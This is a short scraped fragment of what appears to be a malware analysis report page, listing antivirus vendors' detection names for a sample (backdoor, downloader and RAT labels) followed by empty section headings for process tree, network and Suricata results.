Rising	Downloader.Agent!1.EC5B (CLASSIC)
Emsisoft	Gen:Variant.Zusy.501719 (B)
F-Secure	Backdoor.BDS/Redcap.qzrdx
Avira	BDS/Redcap.qzrdx
MAX	malware (ai score=89)
Antiy-AVL	Trojan/Win32.SwimSnake.gen
Microsoft	Trojan:Win32/Wacatac.B!ml
ZoneAlarm	Backdoor.Win32.Lotok.sge
GData	Gen:Variant.Zusy.501719
McAfee	RDN/Generic Dropper
DeepInstinct	MALICIOUS
Cylance	unsafe
TrendMicro-HouseCall	TROJ_GEN.R002H07K223
Fortinet	W32/PossibleThreat
AVG	Win32:RATX-gen [Trj]
Avast	Win32:RATX-gen [Trj]

d-7

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All